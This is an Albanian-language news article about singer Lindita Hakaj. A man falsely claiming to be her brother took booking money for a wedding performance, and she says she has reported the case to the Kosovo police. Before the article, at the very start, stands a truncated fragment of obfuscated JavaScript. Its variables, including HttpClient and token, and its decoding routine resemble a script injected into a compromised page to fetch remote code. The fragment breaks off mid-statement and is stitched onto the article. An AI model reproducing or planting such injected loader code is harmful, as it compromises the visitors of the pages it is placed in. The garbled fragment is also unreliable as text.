;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Linda Hakaj përballet me një rast të pazakontë, ja çka i ndodhi

By

Këngëtarja e muzikës së mirëfilltë shqiptare, Lindita Hakaj, së fundmi është përballur me një rast të pazakontë pasi që një person me mbiemër të njëjtë si të sajin ka përfituar materialisht duke u prezantuar si i vëllai i artistes dhe kështu duke arritur të marrë shumën e parave të prenotimit.

Hakaj ka reaguar përmes një statusi në Facebook, ndërsa ka theksuar faktin që është vetmenaxhere e punës së saj, ndërsa ka bërë të ditur se rastin e ka paraqitur edhe në polici.

“Shoqëri dhe dashamirë. Një person me emrin Shpejtim Hakaj (që nuk e njoh as nuk e kam asgjë në fis) është lajmëruar në emrin tim kinse vëllai im dhe i ka marrë të hollat kinse unë i paskam kërkuar komplet paratë dhe të dielën paska qenë dashur të jem në dasmë, gjë që unë nuk kam menaxher për dasmat i mia, unë flas vet me dasmoret”, ka shkruar ajo.

“Ju lutem nëse dikush lajmërohet në emrin tim mos pranoni të bisedoni sepse nuk kam menaxher (i menaxhoj vet). Nuk i jap llogari askujt për të tilla raste sepse me mbiemrin Hakaj ka shumë por nuk i njoh. Rastin do të paraqes në Policinë e Kosovës dhe do t’i shkoj deri në fund kësaj pune”.

Artikuj të ngjashëm